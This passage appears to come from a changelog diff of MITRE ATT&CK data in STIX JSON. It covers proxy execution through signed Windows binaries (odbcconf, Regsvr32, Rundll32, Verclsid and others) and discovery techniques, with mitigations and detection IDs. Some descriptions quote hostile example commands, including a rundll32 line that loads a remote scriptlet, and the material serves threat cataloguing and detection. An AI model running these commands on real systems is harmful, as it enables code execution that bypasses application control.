+                    "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A &lbrace;REGSVR \"C:\\Users\\Public\\file.dll\"&rbrace;</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/008",
+                            "external_id": "T1218.008"
+                        },
+                        {
+                            "source_name": "TrendMicro Squiblydoo Aug 2017",
+                            "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/"
+                        },
+                        {
+                            "source_name": "TrendMicro Cobalt Group Nov 2017",
+                            "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/"
+                        },
+                        {
+                            "source_name": "LOLBAS Odbcconf",
+                            "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"
+                        },
+                        {
+                            "source_name": "Microsoft odbcconf.exe",
+                            "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2026-04-15 22:40:01.263000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0486: Detecting Odbcconf Proxy Execution of Malicious DLLs"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 19:42:16.439000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Regsvcs/Regasm",
+                    "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/009",
+                            "external_id": "T1218.009"
+                        },
+                        {
+                            "source_name": "LOLBAS Regasm",
+                            "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/"
+                        },
+                        {
+                            "source_name": "LOLBAS Regsvcs",
+                            "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"
+                        },
+                        {
+                            "source_name": "MSDN Regasm",
+                            "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.",
+                            "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx"
+                        },
+                        {
+                            "source_name": "MSDN Regsvcs",
+                            "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.",
+                            "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Casey Smith"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2026-04-15 22:41:42.115000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0361: Detecting .NET COM Registration Abuse via Regsvcs/Regasm"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 19:52:17.414000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Regsvr32",
+                    "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/010",
+                            "external_id": "T1218.010"
+                        },
+                        {
+                            "source_name": "FireEye Regsvr32 Targeting Mongolian Gov",
+                            "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html"
+                        },
+                        {
+                            "source_name": "LOLBAS Regsvr32",
+                            "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
+                        },
+                        {
+                            "source_name": "Microsoft Regsvr32",
+                            "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.",
+                            "url": "https://support.microsoft.com/en-us/kb/249873"
+                        },
+                        {
+                            "source_name": "Carbon Black Squiblydoo Apr 2016",
+                            "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: \u201cSquiblydoo\u201d Continues Trend of Attackers Using Native OS Tools to \u201cLive off the Land\u201d. Retrieved April 9, 2018.",
+                            "url": "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Casey Smith"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-15 22:41:58.327000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1050: Exploit Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0282: Detection Strategy for System Binary Proxy Execution: Regsvr32"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 18:03:46.248000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Rundll32",
+                    "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>  This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/011",
+                            "external_id": "T1218.011"
+                        },
+                        {
+                            "source_name": "rundll32.exe defense evasion",
+                            "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.",
+                            "url": "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/"
+                        },
+                        {
+                            "source_name": "Attackify Rundll32.exe Obscurity",
+                            "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.",
+                            "url": "https://www.attackify.com/blog/rundll32_execution_order/"
+                        },
+                        {
+                            "source_name": "This is Security Command Line Confusion",
+                            "description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.",
+                            "url": "https://www.stormshield.com/news/poweliks-command-line-confusion/"
+                        },
+                        {
+                            "source_name": "Github NoRunDll",
+                            "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.",
+                            "url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll"
+                        },
+                        {
+                            "source_name": "lolbas project Ieframe.dll",
+                            "description": "lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025.",
+                            "url": "https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"
+                        },
+                        {
+                            "source_name": "lolbas project Zipfldr.dll",
+                            "description": "lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025.",
+                            "url": "https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"
+                        },
+                        {
+                            "source_name": "Trend Micro CPL",
+                            "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.",
+                            "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Amir Hossein Vafifar",
+                        "Casey Smith",
+                        "Gareth Phillips, Seek Ltd.",
+                        "James_inthe_box, Me",
+                        "Ricardo Dias"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 22:42:03.135000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1050: Exploit Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0475: Detection Strategy for T1218.011 Rundll32 Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-08-10 13:59:38.443000+00:00",
+                    "modified": "2026-05-12 15:12:00.666000+00:00",
+                    "name": "Verclsid",
+                    "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/012",
+                            "external_id": "T1218.012"
+                        },
+                        {
+                            "source_name": "BOHOPS Abusing the COM Registry",
+                            "description": "BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.",
+                            "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"
+                        },
+                        {
+                            "source_name": "Red Canary Verclsid.exe",
+                            "description": "Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.",
+                            "url": "https://redcanary.com/blog/verclsid-exe-threat-detection/"
+                        },
+                        {
+                            "source_name": "LOLBAS Verclsid",
+                            "description": "LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"
+                        },
+                        {
+                            "source_name": "Nick Tyrer GitHub",
+                            "description": "Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.",
+                            "url": "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5"
+                        },
+                        {
+                            "source_name": "WinOSBite verclsid.exe",
+                            "description": "verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block\u00a0. Retrieved November 17, 2024.",
+                            "url": "https://winosbite.com/verclsid-exe/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Rodrigo Garcia, Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.666000+00:00\", \"old_value\": \"2026-04-15 22:42:21.088000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1037: Filter Network Traffic",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0042: Detection Strategy for T1218.012 Verclsid Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:04.307000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "System Information Discovery",
+                    "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1082",
+                            "external_id": "T1082"
+                        },
+                        {
+                            "source_name": "Amazon Describe Instance",
+                            "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.",
+                            "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html"
+                        },
+                        {
+                            "source_name": "Google Instances Resource",
+                            "description": "Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.",
+                            "url": "https://cloud.google.com/compute/docs/reference/rest/v1/instances"
+                        },
+                        {
+                            "source_name": "Varonis",
+                            "description": "Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.",
+                            "url": "https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire"
+                        },
+                        {
+                            "source_name": "Crowdstrike Hypervisor Jackpotting Pt 2 2021",
+                            "description": "Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/"
+                        },
+                        {
+                            "source_name": "Microsoft Virutal Machine API",
+                            "description": "Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get"
+                        },
+                        {
+                            "source_name": "20 macOS Common Tools and Techniques",
+                            "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
+                            "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
+                        },
+                        {
+                            "source_name": "OSX.FairyTale",
+                            "description": "Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.",
+                            "url": "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Maril Vernon @shewhohacks",
+                        "Praetorian",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2025-10-24 17:48:38.277000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0525: System Discovery via Native and Remote Utilities"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-04-01 16:42:08.735000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "System Location Discovery",
+                    "description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1614",
+                            "external_id": "T1614"
+                        },
+                        {
+                            "source_name": "Bleepingcomputer RAT malware 2020",
+                            "description": "Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.",
+                            "url": "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/"
+                        },
+                        {
+                            "source_name": "AWS Instance Identity Documents",
+                            "description": "Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.",
+                            "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html"
+                        },
+                        {
+                            "source_name": "Securelist Trasparent Tribe 2020",
+                            "description": "Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.",
+                            "url": "https://securelist.com/transparent-tribe-part-1/98127/"
+                        },
+                        {
+                            "source_name": "FBI Ragnar Locker 2020",
+                            "description": "FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved September 12, 2024.",
